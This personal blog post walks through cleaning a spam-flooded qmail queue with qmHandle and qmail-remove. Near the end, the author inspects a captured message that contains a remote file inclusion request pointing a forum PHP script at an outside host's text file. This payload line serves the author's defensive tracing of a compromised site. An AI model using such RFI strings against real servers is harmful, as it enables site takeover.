this morning i try to check my queue, wow i have 32355 email on my qmail server. That’s abnormal count.
for manage your qmail, its easy if using another third party, for example qmHandle and qmail-remove. Install both of them into your machine.For your info, qmHandle now can remove email in queue with on a criterion or use multiple delete requests. But for me, that not more power full than qmail-remove.
it’s hard to find out who is spammer for server wich not run php suexec, so all email from webmail and website client’s, notify by uid apache, for my server is uid 48.

[root@serverku root]# qmHandle -s
Messages in local queue: 0
Messages in remote queue: 32355

[root@serverku root]# qmHandle -l -c | more
1143721 (0, R)
Return-path:
From: [email protected]
To: [email protected]
Subject: failure notice
Date: 23 Nov 2007 11:18:30 +0700
Size: 1472 bytes

1143974 (0, R)
Return-path: [email protected]
From: TELEX/ WIRE TRANSFER DEPT CBN.
To: [email protected]
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.
Date: 23 Nov 2007 11:26:00 +0700
Size: 2103 bytes

1143997 (0, R)
Return-path: [email protected]
From: TELEX/ WIRE TRANSFER DEPT CBN.
To: [email protected]
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.
Date: 23 Nov 2007 11:26:01 +0700
Size: 2110 bytes

1144112 (0, R)
Return-path: [email protected]
From: TELEX/ WIRE TRANSFER DEPT CBN.
To: [email protected]
Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT.
Date: 23 Nov 2007 11:26:05 +0700
Size: 2108 bytes

1144296 (0, R)
Return-path: [email protected]
From: ROBERT MONTE ESQ.
To: [email protected]
Subject: NEXT OF KIN CLAIM S.
Date: 23 Nov 2007 11:26:13 +0700
Size: 2259 bytes

…etc..

from the queue list we can see that a lot of email have subject or sender with the same name. for mine is “Subject: LONG AWAITED CONTRACT / INHERITANCE PAYMENT”. Use this as keyword to remove that spam :

[root@serverku root]# qmail-remove -r -p LONG AWAITED CONTRACT
1261513: no
1261559: no
1261697: yes
moved mess/9/1261697 to yanked/1261697.mess
moved intd/9/1261697 to yanked/1261697.intd
moved todo/9/1261697 to yanked/1261697.todo
1261743: yes
moved mess/9/1261743 to yanked/1261743.mess
moved intd/9/1261743 to yanked/1261743.intd
moved todo/9/1261743 to yanked/1261743.todo
1261835: yes
moved mess/9/1261835 to yanked/1261835.mess
moved intd/9/1261835 to yanked/1261835.intd
moved todo/9/1261835 to yanked/1261835.todo
1255418: yes
moved mess/9/1255418 to yanked/1255418.mess
moved intd/9/1255418 to yanked/1255418.intd
moved todo/9/1255418 to yanked/1255418.todo
1261996: yes
moved mess/9/1261996 to yanked/1261996.mess
moved intd/9/1261996 to yanked/1261996.intd
moved todo/9/1261996 to yanked/1261996.todo
1262065: no
1262088: yes
moved mess/9/1262088 to yanked/1262088.mess
moved intd/9/1262088 to yanked/1262088.intd
moved todo/9/1262088 to yanked/1262088.todo
1262111: yes
moved mess/9/1262111 to yanked/1262111.mess
moved intd/9/1262111 to yanked/1262111.intd
moved todo/9/1262111 to yanked/1262111.todo
1262134: yes
moved mess/9/1262134 to yanked/1262134.mess
moved intd/9/1262134 to yanked/1262134.intd
moved todo/9/1262134 to yanked/1262134.todo
1262157: yes
moved mess/9/1262157 to yanked/1262157.mess
moved intd/9/1262157 to yanked/1262157.intd
moved todo/9/1262157 to yanked/1262157.todo
28650 file(s) match

Now, we have 28650 email removed from the queue into yanked. Just do that step until you can see your email queue under 100. The next step is read them carefully in random email, especially for weird subject or sender or recipient or retunpath :

[root@serverku root]# qmHandle -m1143745 | more

————–
MESSAGE NUMBER 1143745
————–
Received: (qmail 2327 invoked by uid 48); 23 Nov 2007 11:21:09 +0700
Date: 23 Nov 2007 11:21:09 +0700
Message-ID: <[email protected]>
To: [email protected]
Subject: /forum/impex/ImpExData.php
MIME-Version: 1.0
From: /forum/impex/ImpExData.php
Reply-To: [email protected]

————–thedemon—————
:: Inbox: www.website.web.id .
/forum/impex/ImpExData.php?systempath=http://mtdg.xpg.com.br/pnx.txt?
————–thedemon—————

thats the spammer, www.website.web.id, so suspend the site and tell them about this.

Category: techie  Tags: , ,
You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
Leave a Reply

XHTML: You can use these tags: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>